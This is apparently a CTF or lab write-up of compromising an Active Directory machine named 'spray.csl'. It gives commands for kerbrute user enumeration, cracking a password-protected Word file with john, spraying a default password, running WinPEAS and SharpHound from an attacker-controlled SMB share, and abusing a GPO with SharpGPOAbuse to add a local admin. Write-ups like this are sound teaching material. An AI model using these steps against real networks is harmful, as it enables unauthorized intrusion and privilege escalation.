Searching for potential users

Using kerbrute we have found few potential users

/opt/kerbrute userenum -d spray.csl --dc $IP /usr/share/seclists/Usernames/xato-net-10-million-usernames.txt

Searching for credentials

Shares exploration

CDFV2 (Composite Document File V2) Encrypted!! since it’s a word office document we can use john to decrypt it!

/opt/john/run/ Important\ Note.docx > hashvalue

We have found the password to open the file

While using the password we found, we can open the file

We now have a default password “Spray.csl1337”

Searching for more credentials

Using the password found, we couldn’t find any workable match. We went on searching more users and find the following

rpcclient -U 'johana%johana'

We have found a matching user


Using the matching credentials, we now have access on the machine


WinPEAS in memory using Impacket Server

We were not able to run download WinPEAS on the server using certutil or even Powershell. The defense of the server were blocking us.

We managed to run the winPEAS using Impacket server (a simple share)

and the following command

cmd.exe /c \\\kali\WinPEASany_ofs.exe

SharpHound to collect info

Let’s run sharphound on the server

cmd.exe /c \\\kali\SharpHound.exe --CollectionMethods All

Let start (neo4j console and) bloodhound

sudo neo4j console

Abusing GPO

In Bloodhound, we can see that we have some permissions on the Domain controller group policy: “DCPolicy”

We can retrieve the name of the policy by running the following command

Get-GPO -All

Using we are able to exploit this situation

.\SharpGPOAbuse.exe --AddLocalAdmin --UserAccount hackzzdogs --GPOName "DCPolicy"
gpupdate /force

After a machine restart we can now access to the system.txt file